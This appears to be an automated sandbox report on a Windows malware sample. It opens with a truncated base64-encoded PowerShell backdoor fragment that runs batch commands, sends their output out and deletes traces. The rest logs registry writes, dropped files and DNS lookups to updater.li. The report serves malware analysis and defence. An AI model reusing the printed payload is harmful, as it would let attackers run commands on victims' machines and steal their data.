wBlACAAKAAnACMAJwArACcAIwAjACcAKQAsACQAYgBvAHQAaQBkADsADQAKAAkACQAkAGYAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGYAYwApACkAOwANAAoACQAJACQAZgBjAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgAmAHsAaQBlAHgAIAAnACcAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgAnACsAJABmAGMAKwAnACIAJwAnAH0AIgAnADsADQAKAAkACQBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXABEAG4AUwAxAC4AcABzADEAIAAkAGYAYwAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpADsADQAKAAkAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdAANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApAA0ACgAgACAAIAAgAHsADQAKAAkACQBtAGQAIAAtAEYAbwByAGMAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACkAOwANAAoACQAJAEcAZQB0AEkARAA7AA0ACgAJAAkAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABtAGEAaQBuAA0ACgB7AA0ACgAgACAAIAAgAEkAbgBpAHQAOwANAAoAIAAgACAAIABpAGYAKABBAGwAaQB2AGUAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACAAPgAgACcAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAG4AZABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAG0AYQBpAG4AOwANAAoA'}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
2 511
Read events
1 989
Write events
521
Delete events
1

Modification events

(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Multimedia\DrawDib
Operation:writeName:vga.drv 1280x720x32(BGR 0)
Value:
31,31,31,31
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3252) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3484) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRULegacy
Operation:writeName:MRUListEx
Value:
FFFFFFFF
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
02020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:MRUListEx
Value:
0200000000000000010000000700000006000000030000000500000004000000FFFFFFFF
(PID) Process:(3628) f77ee804de304f7c3ea6b87824684b33.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlgLegacy
Operation:writeName:TV_FolderType
Value:
{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}
Executable files
0
Suspicious files
16
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
3252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEKKD4JDJMZK07TK8CWO.temp
MD5:
SHA256:
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1QN5ZTAWO4RBE1ZB137V.temp
MD5:
SHA256:
1920powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TR1MBQMBBMKZUQ19FVYN.temp
MD5:
SHA256:
4012powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P248QSOIFVOPS5Z9DKGQ.temp
MD5:
SHA256:
3816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\02TB4F2WVWZAJ9H5ILNR.temp
MD5:
SHA256:
3700powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIZ9QXGKSNC72PM6I8G6.temp
MD5:
SHA256:
2884powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RKEUBC20HNQ8ZWR3GKI5.temp
MD5:
SHA256:
2896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0XXIX92KIYN6ZCUUSS54.temp
MD5:
SHA256:
3628f77ee804de304f7c3ea6b87824684b33.exeC:\Users\admin\Desktop\test.oxrtext
MD5:
SHA256:
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b048.TMPbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
zz000000RYF30.updater.li
unknown
updater.li
unknown

Threats

No threats detected
No debug info